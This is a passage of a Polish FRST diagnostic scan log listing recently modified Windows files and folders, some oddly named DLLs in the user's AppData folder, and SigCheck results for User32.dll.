12:32 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbser.sys 2019-04-13 15:12 - 2018-12-12 12:32 - 000018944 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbccgpfilter.sys 2019-04-03 17:00 - 2019-04-03 17:00 - 000000000 ____D C:\ProgramData\McAfee ==================== Jeden miesiąc (zmodyfikowane) ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2019-05-02 09:02 - 2011-04-12 15:21 - 000744552 _____ C:\Windows\system32\perfh015.dat 2019-05-02 09:02 - 2011-04-12 15:21 - 000157500 _____ C:\Windows\system32\perfc015.dat 2019-05-02 09:02 - 2009-07-14 07:13 - 000899894 _____ C:\Windows\system32\PerfStringBackup.INI 2019-04-30 19:19 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf 2019-04-30 15:47 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF 2019-04-30 15:45 - 2019-02-20 10:21 - 000000000 ____D C:\ProgramData\3B1FB597 2019-04-30 15:45 - 2017-03-16 22:07 - 000000000 ____D C:\ProgramData\NVIDIA 2019-04-30 15:45 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-04-30 15:45 - 2009-07-14 06:45 - 000016656 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2019-04-30 15:45 - 2009-07-14 06:45 - 000016656 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2019-04-30 15:29 - 2017-05-14 11:40 - 000000000 ____D C:\Windows\system32\appmgmt 2019-04-30 15:28 - 2017-03-17 17:29 - 000003886 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1489764596 2019-04-30 15:28 - 2017-03-17 17:18 - 000000000 ____D C:\Program Files\Opera 2019-04-30 15:12 - 2017-11-24 00:40 - 000000000 ____D C:\Users\user\AppData\Local\chromium 2019-04-30 15:01 - 2017-03-16 21:50 - 000000000 __SHD C:\Users\user\IntelGraphicsProfiles 2019-04-26 17:49 - 2019-02-04 19:48 - 000000000 ____D C:\Users\user\Desktop\obrazki 2019-04-26 17:47 - 2019-02-20 19:34 - 000000000 ____D C:\Users\user\Desktop\KOŁOBRZEG 2019-04-26 17:38 - 2017-11-24 00:38 - 000000000 ____D C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9} 2019-04-25 18:15 - 2017-08-12 12:43 - 000000000 ____D C:\Users\user\Desktop\Zdjęcia i filmiki 2019-04-25 18:01 - 2019-02-20 20:14 - 000000000 ____D C:\Users\user\Desktop\zdjęcia do wywołania 2019-04-22 15:45 - 2019-02-09 21:37 - 000000000 ____D C:\Users\user\Desktop\wszystko 2019-04-17 20:39 - 2019-01-13 12:24 - 000003310 _____ C:\Windows\System32\Tasks\EOSv3 Scheduler onLogOn 2019-04-17 20:39 - 2019-01-13 12:24 - 000003306 _____ C:\Windows\System32\Tasks\EOSv3 Scheduler onTime 2019-04-16 16:26 - 2017-07-11 12:03 - 000000000 ____D C:\Windows\Minidump 2019-04-14 20:24 - 2017-05-03 11:03 - 000000000 ____D C:\Users\user\AppData\Local\CrashDumps 2019-04-11 16:50 - 2017-10-20 00:25 - 000004424 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2019-04-11 16:50 - 2017-03-17 17:36 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe 2019-04-11 16:50 - 2017-03-17 17:36 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2019-04-11 16:50 - 2017-03-17 17:36 - 000004582 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier 2019-04-11 16:50 - 2017-03-17 17:36 - 000000000 ____D C:\Windows\SysWOW64\Macromed 2019-04-11 16:50 - 2017-03-17 17:36 - 000000000 ____D C:\Windows\system32\Macromed 2019-04-03 16:59 - 2017-04-17 16:13 - 000000000 ____D C:\Windows\system32\log 2019-04-03 16:53 - 2017-11-08 18:03 - 000000000 ____D C:\ProgramData\Wondershare 2019-04-03 16:53 - 2017-11-08 18:03 - 000000000 ____D C:\Program Files (x86)\Wondershare ==================== Pliki w katalogu głównym wybranych folderów ======= 2019-03-26 17:18 - 2019-03-26 17:18 - 000457728 _____ () C:\Users\user\AppData\Roaming\CCBcXkRw.dll 2019-03-26 01:04 - 2019-03-26 01:04 - 000457728 _____ () C:\Users\user\AppData\Roaming\CvJLtdsf.dll 2019-02-20 19:31 - 2019-02-20 19:31 - 000345600 _____ () C:\Users\user\AppData\Roaming\WoT.dll 2017-12-12 18:15 - 2017-12-13 18:38 - 000000068 _____ () C:\Users\user\AppData\Local\RPNLJHFDBz ==================== SigCheck =============================== (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\Windows\system32\User32.dll [2010-11-21 05:24] - [2017-03-16 18:08] - 001008640 _____ (Microsoft Corporation) 2C353B6CE0C8D03225CAA2AF33B68D79 C:\Windows\SysWOW64\User32.dll [2010-11-21 05:24] - [2017-03-16 18:08] - 000833024 _____ (Microsoft Corporation) 861C4346F9281DC0380DE72C8D55D6BE LastRegBack: 2019-04-11 17:46 ==================== Koniec FRST.txt ============================